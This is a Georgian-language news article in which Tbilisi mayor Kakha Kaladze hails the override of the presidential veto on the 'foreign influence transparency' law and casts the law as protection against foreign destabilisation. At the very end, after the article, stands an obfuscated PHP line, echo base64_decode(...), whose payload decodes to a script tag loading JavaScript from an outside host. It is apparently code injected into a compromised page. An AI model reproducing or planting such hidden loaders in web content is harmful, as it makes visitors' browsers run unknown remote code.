celsiusi
ავერსი საქკაბელი

ბოლო თვეების განმავლობაში საზოგადოებამ იხილა წარმოუდგენელი მასშტაბის ზეწოლა, მუქარა, შანტაჟი და შეურაცხყოფა მხოლოდ და მხოლოდ იმის გამო, რომ გავბედეთ და დავიცავით საკუთარი ქვეყანა იმ სცენარისგან, რაც სამწუხაროდ უკრაინაში განხორციელდა; რომ გავბედეთ და ყველას გასაგონად მოვითხოვეთ [პასუხი], რატომ არ შეიძლება მივიღოთ კანონი, რომელიც მოქმედებს როგორც ევროპის რიგ ქვეყნებში, ისე ამერიკის შეერთებულ შტატებში,- ასე გამოეხმაურა „ქართული ოცნების“ გენერალური მდივანი და თბილისის მერი, კახა კალაძე თბილისის მუნიციპალიტეტის მთავრობის სხდომაზე „უცხოური გავლენის გამჭვირვალობის შესახებ“ კანონზე პრეზიდენტის ვეტოს დაძლევას.

კალაძემ კანონის მიღება მოულოცა ყველას, „ვისთვისაც ძვირფასია საქართველოს ბედი მისი სუვერენიტეტი და დამოუკიდებლობა“.

„გუშინ პარლამენტის სესია იყო და მინდა გითხრათ, რომ ვეტო დაძლეულია და კანონი „უცხოური გავლენის გამჭვირვალობის შესახებ“ მიღებულია. მინდა მივულოცო ყველას, ვისთვისაც ძვირფასია საქართველოს ბედი, მისი სუვერენიტეტი და დამოუკიდებლობა. ვისთვისაც მნიშვნელოვანია, რომ ქვეყნის მომავალს წყვეტდეს საქართველოს მოსახლეობის უმეტესობა მშვიდ და სტაბილურ გარემოში არჩევნების გზით, როგორც ეს ყველა დემოკრატიულ, ცივილიზებულ განვითარებულ ქვეყნებშია და არა გარე აქტორების ჩარევით. მეგობრებო, ეს არ არის პათეტიკური სიტყვები. დღეს საქართველოს ბედი წყდება არა ხმლით, არა ტანკით, არამედ ჩვენი მოსახლეობის მხარდაჭერით, განმტკიცებული გონივრული, ქვეყნის ინტერესებზე მორგებული პოლიტიკით და კონკრეტული გადადგმული ნაბიჯებით. გამჭვირვალობის კანონმა უნდა დაიცვას ჩვენი ქვეყანა ყველა იმ უცხოური ძალების გავლენისგან, რომელთა მიზანიც ქვეყანაში დესტაბილიზაციის გამოწვევა და მშვიდობის დარღვევაა.

ბოლო თვეების განმავლობაში ჩვენმა საზოგადოებამ იხილა წარმოუდგენელი მასშტაბის ზეწოლა, მუქარა, შანტაჟი და შეურაცხყოფა მხოლოდ და მხოლოდ იმის გამო, რომ გავბედეთ და დავიცავით საკუთარი ქვეყანა იმ სცენარისგან, რაც სამწუხაროდ უკრაინაში განხორციელდა; რომ გავბედეთ და ყველას გასაგონად მოვითხოვეთ [პასუხი] რატომ არ შეიძლება მივიღოთ კანონი, რომელიც მოქმედებს როგორც ევროპის რიგ ქვეყნებში, ისე ამერიკის შეერთებულ შტატებში.

რატომ შეიძლება იყოს გამჭვირვალობა ცუდი და რატომ შეიძლება ეწინააღმდეგებოდეს ევროპულ ღირებულებებს? მთელი ამ ხნის განმავლობაში მივიღეთ ერთი პასუხი და ერთი არგუმენტი. პასუხი იყო - „იმიტომ“, - განაცხადა კალაძე.

164
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");